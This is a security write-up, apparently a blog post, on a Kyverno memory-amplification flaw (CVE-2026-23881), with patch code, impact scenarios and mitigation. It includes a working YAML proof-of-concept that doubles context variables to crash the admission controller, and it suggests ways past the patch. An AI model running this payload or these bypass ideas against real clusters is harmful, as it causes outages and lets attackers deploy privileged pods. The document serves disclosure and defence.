The Policy That Ate the Cluster: Deep Dive into CVE-2026-23881
Jan 27, 2026·7 min read·3 visits
Executive Summary (TL;DR)
Kyverno, the Kubernetes policy engine, failed to cap the memory usage of policy context variables. By chaining JMESPath variable definitions that reference themselves, an attacker can turn a few kilobytes of policy YAML into gigabytes of RAM usage. This OOM-kills the Kyverno controller, causing a Denial of Service. If Kyverno is configured to 'Fail-Open', security checks are bypassed. If 'Fail-Closed', the cluster becomes immutable. Patched in 1.15.3 and 1.16.3.
A logic flaw in Kyverno's variable context handling allows for exponential memory amplification (a 'Billion Laughs' style attack), enabling attackers to crash the admission controller and either bypass security policies or deadlock the cluster.
The Hook: Who Watches the Watcher?
Kubernetes is a beast. To tame it, we use admission controllers—bouncers at the API server door that check your ID and dress code before letting you in. Kyverno is one of the most popular bouncers in town. It lets you define policies like "All pods must have resource limits" or "No one runs as root." To make these policies flexible, Kyverno allows for context variables—little scratchpads where you can fetch data (like ConfigMaps) or manipulate strings before making a decision.
But here's the thing about scratchpads: if you don't limit how much someone can write on them, they're going to write until they run out of paper, or in this case, until the server runs out of RAM. CVE-2026-23881 is a classic resource exhaustion bug, but it's not caused by sending a massive payload over the wire. It's caused by sending a tiny payload that Kyverno politely agrees to turn into a massive one.
This is the logical equivalent of asking a bartender for a beer, then asking for another beer for every beer currently on the bar, recursively. Pretty soon, the bar collapses, the bartender is crushed, and nobody gets a drink. In Kubernetes terms: the admission controller crashes, and your cluster is left either undefended or completely locked down.
The Flaw: Exponential Amplification
The vulnerability lies in the pkg/engine/context component of Kyverno. When a policy is evaluated, Kyverno builds a JSON context object. This object holds variables defined in the policy. The engine processes these variables sequentially. Variable A is computed, then Variable B (which can reference A), and so on.
The developers fell into a classic trap: assuming linear resource consumption. They didn't anticipate that a user might define a variable that is a concatenation of previous variables doubled. By using JMESPath functions like join(), an attacker can take a string S, and define a new variable V1 as S + S. Then V2 as V1 + V1. This is $O(2^n)$ growth.
Mathematically, it looks like this:
Layer 0: 1KB string.Layer 1: 2KB (L0 + L0).Layer 2: 4KB (L1 + L1). ...Layer 18: ~256MB.
Kyverno had no global tracker for the total size of this context. It would happily allocate Go objects for each step until the process hit the container's memory limit (OOM). Because this happens during admission review, it blocks the API server's request until the timeout fires or the pod dies. It is effectively the "Billion Laughs" XML bomb attack, reincarnated in modern cloud-native YAML.
The Code: The Smoking Gun
Let's look at why this happened. In the vulnerable versions, the context handling was essentially a free-for-all map assignment. There was no cumulative accounting.
Here is the logic pre-patch (simplified for clarity):
// Vulnerable Logic
func (c *Context) AddContextEntry(name string, data interface{}) {
// Just throw it in the map. Memory is free, right?
c.jsonContext[name] = data
}The fix, introduced in commit 7a651be3a8c78dcabfbf4178b8d89026bf3b850f, introduced a maxContextSize budget. Now, every time you try to add a variable, the engine checks if you can afford it.
// Patched Logic
func (c *Context) AddContextEntry(name string, data interface{}) error {
// calculate size of new data
size := getSize(data)
// check budget
if c.currentSize + size > c.maxContextSize {
return fmt.Errorf("context size limit exceeded: %d > %d",
c.currentSize + size, c.maxContextSize)
}
c.currentSize += size
c.jsonContext[name] = data
return nil
}> [!NOTE]
> The fix isn't perfect. Calculating the size of a Go interface{} is tricky. The patch often estimates size based on the raw JSON bytes, but the in-memory representation of a map in Go is significantly larger (pointers, overhead). A 2MB limit might still result in 10-20MB of actual heap usage, but it effectively stops the exponential growth to Infinity.
The Exploit: Building the Memory Bomb
Exploiting this requires permission to create a Policy or ClusterPolicy. This is usually restricted to admins, but in multi-tenant clusters or GitOps workflows, a developer might have rights to push policies to their namespace.
We don't need fancy C2 servers. We just need a recursive JMESPath loop. Here is the attack chain:
- Seed: Create a random string of 1KB.
- Amplify: Create 18 layers of variables, each joining the previous layer to itself.
- Trigger: Send a request that matches the policy (e.g., creating a ConfigMap).
context:
- name: l0
variable:
jmesPath: random('[a-zA-Z0-9]{1000}') # 1KB
- name: l1
variable:
jmesPath: join('', [l0, l0]) # 2KB
# ... repeat ...
- name: l18
variable:
jmesPath: join('', [l17, l17]) # 256MBWhen the admission controller processes the l18 variable, it tries to allocate a contiguous 256MB string. If that passes, l19 would need 512MB. The Go Garbage Collector panics, the kernel invokes the OOM Killer, and the pod dies instantly.
The Impact: Fail Open or Fail Closed?
Why is this a High severity and not Critical? Because it requires policy creation rights. However, the impact of a successful exploit is devastating for cluster stability.
Scenario A: failurePolicy: Ignore (The Default)
If Kyverno is configured to ignore failures when it times out or crashes, the Admission Controller effectively vanishes. The bouncer is dead, and the door is wide open. An attacker can crash Kyverno and immediately deploy a privileged pod that mounts the host filesystem, which would normally be blocked by policy.
Scenario B: failurePolicy: Fail (The Secure Choice)
If you configured Kyverno to be secure by default, crashing the controller creates a massive denial of service. Since the webhook fails, the API server rejects all requests that require validation. No new pods, no deployments, no config changes. The cluster is essentially read-only until Kyverno recovers (which it won't, if the malicious policy persists).
Furthermore, the Reports Controller also loads these policies to check background compliance. It will also crash, blinding the security team to the state of the cluster.
The Fix: Mitigation & Bypass Research
The remediation is straightforward: Upgrade to Kyverno 1.15.3 or 1.16.3. These versions introduce a hard cap on context size (default 2MiB).
However, for the paranoid security researchers among us, the patch analysis reveals some interesting edges:
- Monotonic Growth: The
ReplaceContextEntryfunction increments the size tracker but doesn't decrement it when replacing an entry. This means a long-running policy evaluation that updates variables often could hit the limit artificially. This is a potential (though minor) DoS of legitimate policies. - Unmarshaling Overhead: The limit is on the raw bytes. Go's JSON unmarshaler is memory-hungry. An attacker could craft a context that fits the 2MB limit but is structurally complex (deeply nested maps), causing the unmarshaler to allocate far more heap memory than the size tracker accounts for.
Immediate Mitigation:
If you cannot upgrade immediately, use RBAC to strictly control who can create Policy and ClusterPolicy objects. Audit all existing policies for the usage of repeat, join, or recursive variable definitions.
Official Patches
Fix Analysis (2)
Technical Appendix
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:HAffected Systems
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
Kyverno Kyverno | < 1.15.3 | 1.15.3 |
Kyverno Kyverno | >= 1.16.0, < 1.16.3 | 1.16.3 |
| Attribute | Detail |
|---|---|
| CWE | CWE-770 (Resource Allocation without Limits) |
| Attack Vector | Network (via Kubernetes API) |
| CVSS v3.1 | 7.7 (High) |
| Impact | Denial of Service / Security Bypass |
| Exploit Complexity | Low (Requires Policy Creation Rights) |
| Component | pkg/engine/context |
MITRE ATT&CK Mapping
Allocation of Resources Without Limits or Throttling
Known Exploits & Detection
Vulnerability Timeline
Subscribe to updates
Get the latest CVE analysis reports delivered to your inbox.